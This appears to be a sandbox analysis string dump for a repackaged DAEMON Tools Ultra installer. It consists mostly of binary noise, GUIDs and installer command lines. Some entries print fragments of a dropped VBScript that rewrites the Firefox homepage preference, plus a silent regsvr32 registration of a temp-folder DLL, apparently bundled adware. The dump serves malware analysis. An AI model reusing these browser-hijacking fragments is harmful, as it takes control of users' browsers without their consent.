{4C5C32FF-BB9D-43B0-B5B4-2D72E54EAAA4}

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}

Unicode based on Runtime Data (DiscSoftBusService.exe )

{56784854-C6CB-462B-8169-88E350ACB882}

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

{59031A47-3F72-44A7-89C5-5595FE6B30EE}

Unicode based on Runtime Data (DiscSoftBusService.exe )

{645FF040-5081-101B-9F08-00AA002F954E}

Unicode based on Runtime Data (DiscSoftBusService.exe )

{6FE0FCBC-62C7-463B-9774-338B026FF43E}

Unicode based on Runtime Data (DiscSoftBusService.exe )

{871C5380-42A0-1069-A2EA-08002B30309D}

Unicode based on Runtime Data (DiscSoftBusService.exe )

{871C5380-42A0-1069-A2EA-08002B30309D} {000214E6-0000-0000-C000-000000000046} 0xFFFF

Unicode based on Runtime Data (DiscSoftBusService.exe )

{89D83576-6BD1-4C86-9454-BEB04E94C819}

Unicode based on Runtime Data (DiscSoftBusService.exe )

{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}

Unicode based on Runtime Data (DiscSoftBusService.exe )

{9343812E-1C37-4A49-A12E-4B2D810D956B}

Unicode based on Runtime Data (DiscSoftBusService.exe )

{98D99750-0B8A-4C59-9151-589053683D73}

Unicode based on Runtime Data (DiscSoftBusService.exe )

{;T,emk-(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{=qqw}?!3

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{>kGj}uir

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{`8%lmEeJ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{aC5.)@8#9

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}

Unicode based on Runtime Data (DiscSoftBusService.exe )

{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}

Unicode based on Runtime Data (DiscSoftBusService.exe )

{be03D. _

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{C240565B-FC3C-4063-94AF-5AEBB8BBA133}

Unicode based on Runtime Data (DiscSoftBusService.exe )

{c7a85eba-c2d1-41ec-c656-ca2c9221e354}

Unicode based on Runtime Data (HiRu.exe )

{D,Y6 JQz;u

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}

Unicode based on Runtime Data (DiscSoftBusService.exe )

{DE92C1C7-837F-4F69-A3BB-86E631204A23}

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

{E345F35F-9397-435C-8F95-4E922C26259E}

Unicode based on Runtime Data (DiscSoftBusService.exe )

{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}

Unicode based on Runtime Data (DiscSoftBusService.exe )

{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}

Unicode based on Runtime Data (DiscSoftBusService.exe )

{F3F5824C-AD58-4728-AF59-A1EBE3392799}

Unicode based on Runtime Data (DiscSoftBusService.exe )

{MBN<CA'T

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{Qxc[gKCRVX

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{UaA-%a"

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{U{yTR<s

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{vNLT)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{~O>r9"Q

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

|,i\8q2TMz

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

|<>/":

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

|>3fA,?y

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

|>w> 0QgaG

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

|Ae\pxw?6

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

|CDBB%Ce:=

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

|epFw\_g.

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

|JEEEEEEHHG|

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

||~XS

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

}'>^"i,oF={

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

}(*O{N0 _G

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

}@5SRGN;TH-

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

}\q+VLyiy0

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

}^5~uI(#{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

}Dwtu\u.?x)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

}GetSystemColorWW

Ansi based on Dropped File (JSSys3.dll.204366558)

}LVj,7HT}*L

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

}vScreenHeightWWW

Ansi based on Dropped File (JSSys3.dll.204366558)

}w3ua`5%g

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

}Xp1"KZ=N

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

}ZQbmHa[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

}{Fd=bNs!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

}|?F&L;;

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

}||}y|yJJJJAJAA@@@@??????@@}

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

}~{yyzyJCCAACC@BB@@B @B@A

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~ 0*P~;S~

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~,$#[05

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~,6_8%p4k'

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~7J:K=}E,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~9a:*$y(#

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~\!R

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~d1p,PxcU

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~fc_Cl,$!#

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~GetCompNameW

Ansi based on Dropped File (JSSys3.dll.204366558)

~K%8`OR^`

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~nsu.tmp

Unicode based on Hybrid Analysis (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~p^M|&sCLw

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~Szl%,fj)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~v:|z;NFY

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~xxxrZZZ`...M

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~yyzIICICCCBCBBBBBBBBBBBC

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

~~'XC3k&4

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

!!!~JJJJJEJyEJ|HH}}

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

!!"|JEJJJJJJH||H|}

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

!//\~&'W&:

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

!3=:Yhu\+

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

!6R^`-"("

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

!\Q@nE%~'vsQ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

!^Z=os*)"

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

!e]Z{}ikx

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

!M/WVe\9TH

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

!R@]~-?lW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

!This program cannot be run in DOS mode.$

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

"!]zR%g<S

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

",\#9kq5/@l

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

"\start72urez3kr.vbs"

Ansi based on Process Commandline (wscript.exe)

"C:\Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe"

Unicode based on Hybrid Analysis (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00401000.00000020.mdmp)

"%PROGRAMFILES%\DAEMON Tools Ultra\DiscSoftBusService.exe"

Unicode based on Runtime Data (DiscSoftBusService.exe )

"%PROGRAMFILES%\DAEMON Tools Ultra\DiscSoftBusService.exe" /Service

Ansi based on Process Commandline (nsF6AA.tmp)

"%PROGRAMFILES%\DAEMON Tools Ultra\DTAgent.exe" -shellmount "%1"

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

"%PROGRAMFILES%\DAEMON Tools Ultra\dtinst.exe" /reg_scsi

Ansi based on Process Commandline (nsE23E.tmp)

"%PROGRAMFILES%\DAEMON Tools Ultra\dtinst.exe" /unreg_scsi

Ansi based on Process Commandline (nsCDD1.tmp)

###!#!!!!!!!!!!!!!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

#%-("&#!

Ansi based on Dropped File (Uninstall.exe.212096218)

#e8P?rV]{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

#F5@XPdDI}V

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

#F_6S?@{&

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

#gEY)iZL/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

#L*W!2I,@+

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

$ M:oRz}8,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

$'S'yg\@;

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

$._Uq]>=s

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

$?}da(|OD

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

$A:_0kf5-CQlE+(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

$D-j{=-A{(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

$k[_q~%)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

$o\tE8'q)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

%&#v~IIIICIIIIIJyy|~||}}}}

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

%\YYYX]P^zz

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

%DTULTRASCSIBUS.DeviceDesc% = DTULTRASCSIBUS, root\dtultrascsibus

Ansi based on Dropped File (SET4F37.tmp)

%ws\Inf\%ws

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

&############!!!!!!!!!!u

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

&##{IICIIIIJJyJJy|||}||

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

&:1hi'(-#p

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

&E\*9/~M.FD

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

&j@nRE#{{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

&Q}P@HH1x

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

'%]YXYX]Pzzop

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

'_:_.

Ansi based on Image Processing (screen_4.png)

'H-n}VO0:

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

'i</QE/h%M

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

'WScript.Echo "Can't find Firefox preference file [" & strPrefsPath & "]"

Ansi based on Dropped File (start72urez3kr.vbs)

'WScript.Echo "Can't find Firefox profiles file [" & strProfilesFileName & "]"

Ansi based on Dropped File (start72urez3kr.vbs)

'WScript.Echo "Can't find Mozilla Firefox"

Ansi based on Dropped File (start72urez3kr.vbs)

'WScript.Echo "Can't find Opera preference file [" & strPrefsPath & "]"

Ansi based on Dropped File (start72urez3kr.vbs)

(.)q%oIse]?i

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

(.033668:;;=>=>><=4

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

(6VN@6vGc>

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

(7Yyu(>[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

(@MMA!>W\yN

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

(aZYZY\]_^z

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

(D6fFtf]J

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

(null)

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

(ou9yr@Si~L

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

(pb0["(91:

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

(PyW:O|ef

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

(QwGr]5CTg

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

(S&3Qs7{A

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

))&'&&&&&&&&&&&&&#&#####

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

))))&))&'&'&&&&&&&&&&&&

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

)))))))))))))

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

))))))))))))))'&&&(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

)+)QVWVZZ]on

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

)/+6^^WY\\

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

):['e\GlA|

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

)[F?oWg`7

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

)[v3kLH^nu

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

)vLo(0!bE%

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

){ !x:w+X

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

){@&a$>f{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

)}>}~'9YR

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

*2}7EP.a"

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

*?|<>/":

Unicode based on Hybrid Analysis (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

*_m5^S{z:O

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

*xa{uFla:

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

*{6/1J~^J`/,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

+!&<!Xvdd

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

+#!!zIJJJJJJEJEJHHH|

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

+/(+?l%"KW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

+?I@(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

+p[!8@sWJL

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

+r`X}:P:7

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

+ytn86"]}

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

,$.W$N/=

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

,.I;])rxG

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

,K]K24JM]

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

,V~K;/Z+.Y

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

,wu*Q[H.P)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

,wVuC)39")G

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

- Attempt to use MSIL code from this assembly during native code initializationThis indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

- floating point support not loaded

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

-)ohy~@ck2t

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

-//>r@r^

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

-n]\hn)3nv}

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

-{GAOsfS@

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

... %d%%

Unicode based on Hybrid Analysis (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

....00033668::;;;;;<79

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

.1Z.F/+t

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.5)[W@X20r:@ygrEVl

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.5-/<xXS,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.>%]!>,9M

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.?H-s4{[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.\boost/exception/detail/exception_ptr.hpp

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

.\d6t@

Ansi based on Dropped File (Uninstall.exe.212096218)

.\mmommoomopmopnmppnp

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.]MtF".PJ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.a2 s193(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.cvR[-}7!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.DEFAULT\Control Panel\International

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.i/\=pS5]

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.jSGCPlQ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.kI/63zEXh

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.KjV.

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

.NN-KNLKT\O\_Wb

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.Pattern = "(user_pref\(""browser\.startup\.homepage"", )(.*)(\);)"

Ansi based on Dropped File (start72urez3kr.vbs)

.t$[Zvtm&

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.Ta{E!jo.

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

.Write objRegExp_HomePage.Replace(strContent, "$1""" & strHomePage & """$3")

Ansi based on Dropped File (start72urez3kr.vbs)

.WriteLine "user_pref(""browser.startup.homepage"", """ & strHomePage & """);"

Ansi based on Dropped File (start72urez3kr.vbs)

/"V:~(]60Z

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

/*:ZdnOwlk

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

/+p8(!,dbV

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

/////

Ansi based on Dropped File (JSSys3.dll.204366558)

//////

Ansi based on Dropped File (JSSys3.dll.204366558)

//8Xcfk

Ansi based on Dropped File (Uninstall.exe.212096218)

/1:::R::R6TYM\[W\

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

/:Z`ik`Xg

Ansi based on Dropped File (Uninstall.exe.212096218)

/>s_(bZz;

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

/>XRw=+:

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

/\mmpmmponppppppppppp

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

/reg_scsi

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

/reg_scsi %s %s "%s"

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

/reg_scsi dtultrascsibus {874FDCE0-46C5-4C59-8B25-3159C12C6B86} "DAEMON Tools Ultra Virtual SCSI Bus"

Ansi based on Process Commandline (dtinst.exe)

/reg_usb_client

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

/reg_usb_server

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

/s "%TEMP%\HiRu\JSSys3.dll"

Ansi based on Process Commandline (regsvr32.exe)

/service

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

/Service

Ansi based on Process Commandline (DiscSoftBusService.exe)

/uninstalldriver

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

/unreg_scsi

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

/unreg_scsi %s

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

/unreg_scsi dtultrascsibus

Ansi based on Process Commandline (dtinst.exe)

/unreg_usb_client

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

/unreg_usb_server

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

0*9Y}:cB)$azm

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

0,+B@ew}

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

0.0.0.0

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

0W2:.L=oT

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

1$1(1,1014181<1@1D1H1L1P1T1X1\1`1d1h1l1p1t1x1|1

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

1.20.0.0

Unicode based on Dropped File (imgengine.dll.62529018)

1]lS$]|$

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

1g2)7Sz}4

